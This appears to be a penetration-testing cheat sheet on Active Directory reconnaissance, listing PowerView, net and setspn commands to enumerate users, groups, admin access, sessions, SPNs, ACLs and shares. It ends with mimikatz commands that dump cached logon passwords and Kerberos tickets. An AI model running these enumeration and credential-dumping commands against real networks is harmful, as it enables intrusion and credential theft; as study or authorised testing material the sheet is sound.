# Domain Recon

The following are tools and scripts that can be used to collect information about the domain.

## Basic Domain Info

```
#Using Powerview
Get-NetDomain
```

## List of Computers

```
#Using Powerview
Get-NetComputer
```

## List of Domain Users

```
net user /domain
```

## Domain User Attributes and Details

```
net user <username> /domain

#Using Powerview and the output can be filtered using pipe & name (e.g. cn)
Get-NetUser
```

## Check User Admin Access

```
#Using Powerview
Find-LocalAdminAccess
```

## List of Domain Groups

```
net group /domain
```

## Domain Group Privileges

```
#Using Powerview
Get-NetGroup
```

## Domain Users to Domain Group Mapping

```
net group "<group name>" /domain

#Using Powerview
Get-NetGroup "<group_Name>" | select member
```

## List of Logged in Domain Users

```
#Using Powerview
Get-NetSession -ComputerName xyz -Verbose

#Using PsLoggedon
.\PsLoggedon.exe \\hostname
```

The above commands can be used to find the logged in users in a remote machine. But for various reasons both commands could fail.&#x20;

[PsLoggedon](https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon) is executable made available by Microsoft to list the logged on users on a remote system.&#x20;

## List of SPNs in Domain

```
#Using Powerview
Get-NetUser -SPN | select samaccountname,serviceprincipalname

#Using setspn
setspn -L <user>
```

[Setspn](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241\(v=ws.11\)) is an executable made available by Microsoft to list the SPNs present in a domain.&#x20;

## Get Object ACL

```
#Using Powerview
Get-ObjectAcl -Identity <obj name>

#Filtering down to Active Directory Rights with GenericAll persmission
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
```

## List Domain Shares

```
#Using Powerview
Find-DomainShare
```

Cached AD Credentials

Credentials of users are usually cached and can be retrieved using the mimikatz executble.

```
.\mimikatz.exe

#Within mimikatz
privilege::debug
sekurlsa::logonpasswords

#We can list the cached tickets using the following command,
sekurlsa::tickets
```